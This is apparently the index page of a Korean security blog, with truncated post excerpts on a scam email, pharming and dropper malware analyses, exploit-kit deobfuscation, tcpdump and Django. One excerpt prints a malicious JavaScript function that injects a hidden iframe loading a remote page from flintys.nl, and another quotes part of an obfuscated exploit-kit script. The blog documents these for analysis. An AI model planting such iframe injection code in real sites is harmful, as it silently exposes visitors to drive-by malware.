일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
- Craco
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- speed-measure-webpack-plugin
- 로맨스스캠
- md5
- esbuild
- 사진도용
- ssrf
- 많다..
- react
- 변태는
- sha256
- aes
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- hash
- 스캠
- Malware Sample
- XSS
- shell_gpt
- self-signed
- decrypt
- encrypt
- CryptoJS
- 모의해킹
- 취약점
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- https
- NUGU
- open redirect
- 채팅환전사기
- Today
- Total
목록전체 글 (209)
annyoung
http://m.news.naver.com/hotissue/read.nhn?sid1=102&cid=1011835&iid=3973737&oid=001&aid=0007959674 요즘 메일이 안날아 오더니 드디어 잡혔네. 미국형 선입금 사기로써 "아프리카 상속유산 나눠 줄게", "은행에 묶인 돈을 풀어주게 해달라"는 등. 그 말을 하는 언변 실력이 대단하다. 1차적으로 구글, 네이버, 다음 등에서 크롤링하여 이메일 주소를 수집한 후, SMTP를 이용하여 자동 발신한다.(이 때 사용하는 SMTP 계정은 가계정 혹은 피싱 사이트를 이용하여 해킹한 아이디를 가지고 진행하게 된다) 내용은 다음과 같다. Hi, My name is Mr. David Causer I am the general director of a ..
"이름/나이/블로그 카테고리/예전 블로그가 있다면 주소/티스토리 블로그 개설 목적"에 대해서 적어주시면 검토 후 초대해드리겠습니다. 작심 삼일이 아니라 잘 운영하실 분만 덧글 달아주셨으면 좋겠습니다. 감사합니다.
오랜만에 TLS callback 사용하는 파밍 악성코드를 만났다. css.exe이라는 이름을 가진 파밍형 악성코드이다. TLS callback 함수에 대해서 예전에 어떤분의 부탁으로 인하여 글을 쓰게 되었는데, 그걸 참고하고 따라 하시길 바란다.[ TLS callback 우회 방법 및 분석 : http://nopsled.tistory.com/122 ] FileName css.exe MD5 C1D2C110AB24B178FA63112A389D0379 SHA-1 7193A91AAAB63CC2EB1A5EB9B30CB611A1F6F284 Packer Unknown packer (Seems to VMProtect) [표1] 악성코드 정보 0012F794 004358AC /CALL to IsDebuggerPresen..
특정 백신업체(AVG 등..)가 현재 제 블로그를 악성으로 탐지한다고 합니다. [탐지명 : JavaScript Obfuscation (type 2905)] 아마 이 문제는 본문에 자바 스크립트 난독화 샘플이 첨부 되어서 시그네이쳐 기반에 의한 탐지로 확인 되므로 걱정하지 않으셔도 됩니다. 또한, 여러번 블로그를 둘러 본 결과, 침해사고의 흔적 및 악성 스크립트 삽입의 흔적이 보이지 않습니다. 감사합니다.
아이닥터 사이트에서 공다팩을 이용하여 악성코드 유포중이다. 내가 아는게 맞다면 이런식으로 표현하는 것으로 기억한다. 차례대로 난독부, 해제부, 실행부로 나뉜다. 해당 공다팩 deobfuscation 방법은 http://14.63.218.164:8000/gongda/ 에서 복호화가 가능하다. 이 외에도, 스크립트 수정을 이용하여 복호화가 가능하다. 위와 같이 ciphertext에는 난독부를 써 넣는다. key_string부분에는 해제부 부분을 복사하여 붙여넣으면 원문이 나오게 된다. 다음에서 복호화 내용이 나온다. TmgTSW3 = lDFd4;xqIaG7 = Uqrvis1(20100418);while (window.closed) {}document.write(" ");var gondady = documen..
흔히들 말하는 파리떼(Parite) 바이러스이다. 한번 감염되면 거의 포맷을 해야되는 상황까지 오는.. 그러니 빨리 치료를 하던지 놔두고 포맷을 하던지 둘 중 하나다. 이런 악성코드에 감염되면 참 골치아프다. 나름 랜섬웨어(?) 비슷한 놈이다. 중국 카지노 사이트에서 유포되고 있는 페이지 소스 중 VBScript만 채증했다. WriteData에는 악성코드의 Data가 담겨 있고 CreateObject를 통하여 FileSystemObject를 로드하여 파일을 저장한다. (요즘도 이게 되나 싶다...) FileName svchost.exe MD5 FF5E1F27193CE51EEC318714EF038BEF SHA-1 B4FA74A6F4DAB3A7BA702B6C8C129F889DB32CA6 Packer UPX ..
2014.12.03, 친구 집에서 채증한 악성코드이다. 해당 악성코드의 특징은 없는 것 같다. 패킹도 안되었고 그렇다고 해서 특별히 암호화를 시켜놓은 것도 아니다. 아니, 리소스 영역의 DLL파일만 암호화가 되어 있기는 했다. 자 이제 오랜만에 분석을 시작해야겠다. FileName svchost.exe MD5 7F00B395A356F5BB1CEFFD779ED8FFA7 SHA-1 A6F1968B403D96D382521466E0D6C4AC2CB868C6 Packer 패킹된 파일이 아님[표1 - 악성코드 정보] 악성행위를 시작하는 Address는 00401FB0이다. 해당 서브 루틴에서 FindResource를 이용하여 리소스 영역중 Dll 부분을 참조한 후 Resource address를 넘겨주어 로드시킨다..
This Page Unable을 출력해준다. 누가 보면 정말 페이지 사용 못하는 줄 알겠다.. function gxr09() { var static='ajax'; var controller='index.php'; var gxr = document.createElement('iframe'); gxr.src = 'http://flintys.nl/count.php'; gxr.style.position = 'absolute'; gxr.style.color = '84119'; gxr.style.height = '84119px'; gxr.style.width = '84119px'; gxr.style.left = '100084119'; gxr.style.top = '100084119'; if (!document.ge..
# tcpdump usagetcpdump -i [network_device] -s 65535 -w [filename] tcpdump -i eth0 -s 65535 -w test.pcap
I have to development about web project..html and php is old.. so, i decided to use django!! django is so useful and quick and idk about web programming. but this is so good idea about using python django division project and application. project's big notion, application's into project's small notion.so we building about standard setting in django.* [important] ah, django must installed!! * 1. ..